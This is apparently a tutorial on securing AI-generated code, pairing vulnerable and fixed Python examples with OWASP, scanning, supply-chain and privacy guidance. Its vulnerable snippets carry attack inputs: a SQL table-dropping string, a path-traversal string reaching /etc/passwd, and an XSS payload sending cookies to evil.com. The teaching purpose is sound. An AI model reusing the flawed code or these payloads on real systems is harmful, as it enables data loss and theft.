Pular para o conteúdo principal

Security in AI-Assisted Coding

Theory 45 min

Why Security Matters More with AI Code

AI coding assistants generate code by predicting statistically likely patterns from training data. This training data includes millions of repositories — many of which contain insecure code, outdated practices, and even known vulnerabilities.

Critical Warning

Studies show that AI-generated code contains security vulnerabilities in approximately 40% of cases when developers don't specify security requirements in their prompts. AI models optimize for functional correctness, not security by default.

Real-World Analogy

Imagine a chef trained by watching every cooking video on the internet — including ones with bad hygiene practices. The chef can make delicious-looking food, but if you don't specifically ask for food safety compliance, they might skip hand-washing. AI code generation works the same way: you must explicitly request secure coding practices.


Common Security Vulnerabilities in AI-Generated Code

1. SQL Injection

AI models frequently generate code that concatenates user input directly into SQL queries instead of using parameterized queries.

❌ Insecure (AI often generates this):

# VULNERABLE: SQL Injection
@app.get("/users")
def search_users(name: str):
query = f"SELECT * FROM users WHERE name = '{name}'"
result = db.execute(query)
return result.fetchall()

# Attack: name = "'; DROP TABLE users; --"

✅ Secure (what you should require):

# SAFE: Parameterized query
@app.get("/users")
def search_users(name: str):
query = text("SELECT * FROM users WHERE name = :name")
result = db.execute(query, {"name": name})
return result.fetchall()

Even better with an ORM:

# SAFE: SQLAlchemy ORM
@app.get("/users")
def search_users(name: str, db: Session = Depends(get_db)):
return db.query(User).filter(User.name == name).all()
SQL Injection is #1 for a Reason

SQL injection has been the #1 web application vulnerability for over two decades. AI models, trained on older code, frequently produce injectable queries. Always use parameterized queries or an ORM.

2. Hardcoded Secrets and Credentials

AI models often include placeholder credentials that developers forget to replace:

❌ Insecure:

# VULNERABLE: Hardcoded credentials
DATABASE_URL = "postgresql://admin:password123@db.example.com:5432/production"
API_KEY = "sk-1234567890abcdef"
JWT_SECRET = "super-secret-key"

def get_db():
return create_engine(DATABASE_URL)

✅ Secure:

# SAFE: Environment variables
import os
from dotenv import load_dotenv

load_dotenv()

DATABASE_URL = os.environ["DATABASE_URL"]
API_KEY = os.environ["API_KEY"]
JWT_SECRET = os.environ["JWT_SECRET"]

def get_db():
if not DATABASE_URL:
raise RuntimeError("DATABASE_URL environment variable is not set")
return create_engine(DATABASE_URL)

3. Insecure Deserialization

AI may suggest using pickle to load untrusted data — a critical vulnerability:

❌ Insecure:

import pickle

# VULNERABLE: Loading untrusted pickle data
def load_model(file_path: str):
with open(file_path, "rb") as f:
return pickle.load(f) # Can execute arbitrary code!

✅ Secure:

import joblib
import hashlib

# SAFE: Verify integrity before loading
EXPECTED_HASH = "sha256:a1b2c3d4..."

def load_model(file_path: str):
with open(file_path, "rb") as f:
data = f.read()

file_hash = f"sha256:{hashlib.sha256(data).hexdigest()}"
if file_hash != EXPECTED_HASH:
raise ValueError("Model file integrity check failed")

return joblib.load(file_path)

4. Path Traversal

AI-generated file handling code often doesn't validate paths:

❌ Insecure:

# VULNERABLE: Path traversal
@app.get("/files/{filename}")
def get_file(filename: str):
file_path = f"/uploads/{filename}"
return FileResponse(file_path)

# Attack: filename = "../../etc/passwd"

✅ Secure:

from pathlib import Path

UPLOAD_DIR = Path("/uploads").resolve()

@app.get("/files/{filename}")
def get_file(filename: str):
safe_path = (UPLOAD_DIR / filename).resolve()

if not safe_path.is_relative_to(UPLOAD_DIR):
raise HTTPException(status_code=400, detail="Invalid file path")

if not safe_path.exists():
raise HTTPException(status_code=404, detail="File not found")

return FileResponse(safe_path)

5. Missing Input Validation

AI often generates the "happy path" without validating inputs:

❌ Insecure:

# VULNERABLE: No input validation
@app.post("/transfer")
def transfer_money(data: dict):
from_account = data["from"]
to_account = data["to"]
amount = data["amount"]

db.execute(f"UPDATE accounts SET balance = balance - {amount} WHERE id = {from_account}")
db.execute(f"UPDATE accounts SET balance = balance + {amount} WHERE id = {to_account}")
return {"status": "success"}

✅ Secure:

from pydantic import BaseModel, Field, validator

class TransferRequest(BaseModel):
from_account: int = Field(..., gt=0)
to_account: int = Field(..., gt=0)
amount: float = Field(..., gt=0, le=10000)

@validator("to_account")
def accounts_must_differ(cls, v, values):
if "from_account" in values and v == values["from_account"]:
raise ValueError("Cannot transfer to the same account")
return v

@app.post("/transfer")
def transfer_money(request: TransferRequest, db: Session = Depends(get_db)):
with db.begin():
sender = db.query(Account).filter(Account.id == request.from_account).with_for_update().first()
if not sender or sender.balance < request.amount:
raise HTTPException(status_code=400, detail="Insufficient funds")

sender.balance -= request.amount
receiver = db.query(Account).filter(Account.id == request.to_account).with_for_update().first()
if not receiver:
raise HTTPException(status_code=404, detail="Receiver account not found")
receiver.balance += request.amount

return {"status": "success", "new_balance": sender.balance}

6. Cross-Site Scripting (XSS)

AI may generate web code that doesn't escape user input:

❌ Insecure:

# VULNERABLE: XSS via unescaped HTML
@app.get("/profile/{username}")
def show_profile(username: str):
return HTMLResponse(f"<h1>Welcome, {username}!</h1>")

# Attack: username = "<script>document.location='http://evil.com/steal?c='+document.cookie</script>"

✅ Secure:

from markupsafe import escape

@app.get("/profile/{username}")
def show_profile(username: str):
safe_name = escape(username)
return HTMLResponse(f"<h1>Welcome, {safe_name}!</h1>")

OWASP Top 10 and AI-Generated Code

The OWASP Top 10 is the standard reference for web application security risks. Here's how AI-generated code intersects with each:

OWASP RiskAI RelevanceRisk Level
A01: Broken Access ControlAI rarely generates authorization checks unless asked🔴 Critical
A02: Cryptographic FailuresAI may use weak algorithms (MD5, SHA1 for passwords)🔴 Critical
A03: InjectionSQL, NoSQL, command injection from string concatenation🔴 Critical
A04: Insecure DesignAI generates code, not architecture — missing security design🟡 High
A05: Security MisconfigurationDebug mode on, default credentials, verbose errors🟡 High
A06: Vulnerable ComponentsAI may suggest outdated or vulnerable packages🔴 Critical
A07: Auth FailuresWeak password policies, missing rate limiting, session flaws🟡 High
A08: Data Integrity FailuresInsecure deserialization (pickle), missing integrity checks🟡 High
A09: Logging FailuresAI often omits logging; may log sensitive data when it does🟢 Medium
A10: SSRFAI-generated URL fetching without validation🟡 High

Code Scanning and Security Tools

Never rely solely on manual review. Use automated tools to catch vulnerabilities:

Python-Specific Tools

ToolWhat It ScansIntegration
BanditPython-specific security issues (eval, pickle, SQL)CLI, CI/CD, pre-commit
SafetyKnown vulnerabilities in installed packagesCLI, CI/CD
pip-auditPackage vulnerability database (PyPI)CLI, GitHub Actions
mypyType errors that can lead to security issuesCLI, IDE, CI/CD

General-Purpose Tools

ToolWhat It ScansLanguage Support
SnykDependencies + code vulnerabilitiesPython, JS, Java, Go, ...
SonarQubeCode quality + security vulnerabilities30+ languages
SemgrepCustom static analysis rulesPython, JS, Go, Java, ...
TrivyContainer images + IaC + filesystemUniversal
CodeQLDeep semantic code analysisPython, JS, Java, C/C++, Go

Example: Running Bandit on AI-Generated Code

# Install bandit
pip install bandit

# Scan a single file
bandit -r my_ai_generated_code.py

# Scan entire project with medium+ severity
bandit -r ./src -ll

# Generate a report
bandit -r ./src -f json -o security_report.json

Example Bandit output:

>> Issue: [B608:hardcoded_sql_expressions] Possible SQL injection vector
Severity: Medium Confidence: Low
Location: ./api/routes.py:42
More Info: https://bandit.readthedocs.io/en/latest/plugins/b608

41 def search_users(name: str):
42 query = f"SELECT * FROM users WHERE name = '{name}'"
43 result = db.execute(query)

Integrating Security Scanning into Your Workflow

View Security Scanning Pipeline

Supply Chain Attacks

The Risk of AI-Suggested Packages

AI models can suggest packages that:

  1. Don't exist — attackers can register these names with malicious code ("dependency confusion")
  2. Are typosquats — similar names to popular packages (e.g., reqeusts vs requests)
  3. Are deprecated — no longer maintained, with known vulnerabilities
  4. Are compromised — legitimate packages whose maintainer accounts were hacked

How to Verify a Package

Before running pip install on any AI-suggested package:

# 1. Check if it exists and see metadata
pip index versions package-name

# 2. Check on PyPI website
# Visit: https://pypi.org/project/package-name/

# 3. Look at download statistics (should be high for legitimate packages)
# Visit: https://pypistats.org/packages/package-name

# 4. Check the GitHub repository linked from PyPI
# - Does it have stars?
# - When was it last updated?
# - Does the author maintain other known packages?
Real Attack: The "pytorch-nightly" Incident

In December 2022, a malicious package torchtriton was uploaded to PyPI and was installed by anyone who ran pip install pytorch-nightly. The package stole SSH keys, AWS credentials, and other sensitive files. Always verify packages before installing.

Checklist: Before Installing an AI-Suggested Package
  • Verify the package exists on PyPI
  • Check the download count (major packages have millions of downloads)
  • Verify the author/maintainer is credible
  • Check when it was last updated (avoid abandoned packages)
  • Read the GitHub README and issues
  • Check for known vulnerabilities: pip-audit or safety check
  • Compare the exact package name (watch for typosquatting)
  • Pin the version in your requirements file

Data Privacy When Using AI Tools

What Data Gets Sent to AI Providers

When you use AI coding tools, your code is sent to external servers for processing:

ToolData SentData RetentionCan Opt Out?
GitHub CopilotCurrent file + contextNot used for training (Business)Yes (Business plan)
ChatGPTEverything you pasteMay be used for training (Free)Yes (opt out in settings)
CursorFiles + project contextVaries by plan and modelPrivacy mode available
CodeWhispererCurrent fileNot shared (Professional)Yes
Data Privacy Risks

Never paste the following into AI chat tools:

  • API keys, passwords, or tokens
  • Customer data or PII (Personally Identifiable Information)
  • Proprietary algorithms or trade secrets
  • Internal infrastructure details (IPs, hostnames, credentials)
  • Data subject to compliance requirements (HIPAA, PCI-DSS, GDPR)

Mitigation Strategies

StrategyDescription
Use enterprise plansBusiness plans typically don't train on your code
Sanitize before promptingReplace real secrets with placeholders before pasting
Self-hosted modelsRun open-source models locally (Ollama + CodeLlama, DeepSeek)
Code review policiesRequire human review of all AI-generated code
DLP toolsUse Data Loss Prevention tools to detect leaked secrets

How to Sanitize Code Before Prompting

# BEFORE SENDING TO AI (your actual code):
DATABASE_URL = "postgresql://prod_admin:X7$kL9mN@db.mycompany.com:5432/customers"
STRIPE_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"

# AFTER SANITIZING (what you send to AI):
DATABASE_URL = "postgresql://user:password@hostname:5432/dbname"
STRIPE_KEY = "sk_live_XXXXXXXXXXXXXXXXXXXX"

Intellectual Property Concerns

Key Questions for AI-Generated Code

QuestionConsideration
Who owns AI-generated code?Varies by jurisdiction — generally the developer/company
Can AI reproduce copyrighted code?Yes — AI may reproduce GPL/AGPL code verbatim
License contamination?If AI copies GPL code into your MIT project, you may have a problem
Patent risks?AI may generate code that infringes on software patents

Best Practices for IP Protection

  1. Enable code reference detection — GitHub Copilot can flag when suggestions match public code
  2. Use license-aware tools — Some tools filter out suggestions from copyleft repos
  3. Document AI usage — Keep records of what was AI-generated for legal clarity
  4. Review for uniqueness — If a suggestion looks too specific, search for the source
  5. Follow your organization's AI policy — Many companies have specific guidelines

Secure Coding Checklist for AI-Generated Code

Use this comprehensive checklist every time you integrate AI-generated code:

Authentication & Authorization

  • All endpoints require authentication unless explicitly public
  • Authorization checks verify the user has permission for the specific resource
  • Passwords are hashed with bcrypt/argon2 (not MD5/SHA1)
  • JWT tokens have appropriate expiration times
  • Rate limiting is applied to auth endpoints

Input Validation

  • All user inputs are validated (type, length, format, range)
  • SQL queries use parameterized statements or ORM
  • File paths are validated against path traversal
  • URLs are validated before fetching (SSRF prevention)
  • HTML output is escaped to prevent XSS

Data Protection

  • No hardcoded credentials, API keys, or secrets
  • Sensitive data is encrypted at rest and in transit
  • Logs don't contain passwords, tokens, or PII
  • Error messages don't leak internal implementation details
  • Database connections use TLS/SSL

Dependencies

  • All packages exist on PyPI/npm and are legitimate
  • Package versions are pinned in requirements files
  • No known vulnerabilities (checked with pip-audit/safety)
  • No unnecessary dependencies (minimize attack surface)

Error Handling

  • Exceptions are caught and handled appropriately
  • Generic error messages are returned to users (no stack traces)
  • Detailed errors are logged server-side for debugging
  • Application doesn't crash on unexpected input

Security-Focused Prompting

To get more secure code from AI, explicitly request security in your prompts:

❌ Insecure prompt:

Write a login endpoint for FastAPI

✅ Security-focused prompt:

Write a secure login endpoint for FastAPI that:
- Uses bcrypt for password verification
- Returns JWT tokens with 15-minute expiry
- Implements rate limiting (5 attempts per minute per IP)
- Returns generic "Invalid credentials" for both wrong email and wrong password
- Logs failed attempts without logging the attempted password
- Uses constant-time comparison for password verification
- Sets secure, HTTP-only cookie flags for the token

Key Takeaways

ConceptSummary
AI security risk~40% of AI-generated code contains vulnerabilities when security isn't specified
Top vulnerabilitiesSQL injection, hardcoded secrets, path traversal, XSS, insecure deserialization
OWASP alignmentAI code frequently triggers OWASP Top 10 categories
Scanning toolsBandit, Snyk, SonarQube, Semgrep, pip-audit
Supply chainVerify all AI-suggested packages before installing
Data privacyNever paste secrets, PII, or proprietary code into AI tools
IP concernsAI may reproduce copyrighted code — enable reference detection
Secure promptingExplicitly request security requirements in every prompt

Further Reading